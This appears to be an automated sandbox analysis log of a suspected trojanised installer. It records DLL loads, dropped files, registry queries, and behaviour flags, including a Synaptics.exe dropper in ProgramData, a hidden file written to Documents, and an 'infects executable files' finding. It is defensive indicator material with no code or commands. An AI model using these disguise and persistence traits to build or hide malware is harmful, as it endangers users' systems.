Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: usoapi.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: sxproxy.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: spp.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: srclient.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: srcore.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: wer.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\SrTasks.exe	Section loaded: vss_ps.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: msi.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: version.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: cabinet.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: msxml3.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: msi.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: version.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: cabinet.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: msxml3.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: msi.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: version.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: cabinet.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: msxml3.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: feclient.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: msimg32.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: windowscodecs.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: explorerframe.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: riched20.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: usp10.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: msls31.dll
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Section loaded: textshaping.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe

File written: C:\Users\user\AppData\Local\Temp\LXIDmDY.ini

Jump to behavior

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Automated click: I agree to the license terms and conditions
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe

Window detected: Number of UI elements: 23

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: file.exe

Static file information: File size 15183872 > 1048576

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: file.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xdd0800

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: file.exe, ._cache_file.exe.0.dr, VC_redist.x86.exe.8.dr, VC_redist.x86.exe.3.dr, ._cache_file.exe.2.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcamp140.i386.pdb source: vcamp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140CHS.i386.pdb source: mfc140chs.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcomp140.i386.pdb source: vcomp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\mfc140u.i386.pdb source: mfc140u.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140_2.i386.pdbGCTL source: msvcp140_2.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140JPN.i386.pdb source: mfc140jpn.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.16.dr
Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\WixStdBA.pdb source: ._cache_file.exe, 00000003.00000002.4001493943.000000006CD6F000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x86.exe, 00000014.00000002.4001098826.0000000062E6F000.00000002.00000001.01000000.00000012.sdmp, wixstdba.dll.20.dr, wixstdba.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140CHT.i386.pdb source: mfc140cht.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcomp140.i386.pdbGCTL source: vcomp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFCM140.i386.pdb source: mfcm140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcamp140.i386.pdbGCTL source: vcamp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ITA.i386.pdb source: mfc140ita.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ESN.i386.pdb source: mfc140esn.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ENU.i386.pdb source: mfc140enu.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140_2.i386.pdb source: msvcp140_2.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\mfc140.i386.pdb source: mfc140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdbGCTL source: vccorlib140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdb source: vccorlib140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFCM140U.i386.pdb source: mfcm140u.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdbGCTL source: msvcp140_codecvt_ids.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\mfc140.i386.pdbGCTL source: mfc140.dll.16.dr
Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\WixDepCA.pdb source: 452cb9.msi.16.dr, 452cb2.msi.16.dr

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe

Code function: 3_2_6CD51C04 LoadLibraryW,GetProcAddress,GetLastError,FreeLibrary,

3_2_6CD51C04

Source: ._cache_file.exe.0.dr	Static PE information: section name: .wixburn
Source: ._cache_file.exe.2.dr	Static PE information: section name: .wixburn
Source: VC_redist.x86.exe.3.dr	Static PE information: section name: .wixburn
Source: VC_redist.x86.exe.8.dr	Static PE information: section name: .wixburn
Source: mfc140u.dll.16.dr	Static PE information: section name: .didat
Source: msvcp140.dll.16.dr	Static PE information: section name: .didat
Source: mfc140.dll.16.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007EE876 push ecx; ret	2_2_007EE889
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E6E876 push ecx; ret	3_2_00E6E889
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD5EE46 push ecx; ret	3_2_6CD5EE59
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C3E876 push ecx; ret	8_2_00C3E889
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0073E876 push ecx; ret	18_2_0073E889
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E5EE46 push ecx; ret	20_2_62E5EE59

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\~$cache1

Jump to dropped file

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\mfcm140u.dll
Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\mfc140.dll
Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\mfc140u.dll
Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\vcomp140.dll
Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\mfcm140.dll

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140ita.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140esn.dll	Jump to dropped file
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	File created: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: 452cb8.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140deu.dll	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_file.exe	File created: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\vcamp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140jpn.dll	Jump to dropped file
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140chs.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfcm140u.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vccorlib140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: 452cb7.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140u.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\Synaptics\RCXD314.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\concrt140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140kor.dll	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\~$cache1	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_2.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: 452cb6.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140fra.dll	Jump to dropped file
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\wixstdba.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Desktop\._cache_file.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\vcomp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140enu.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140rus.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vcruntime140.dll	Jump to dropped file
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\wixstdba.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140cht.dll	Jump to dropped file
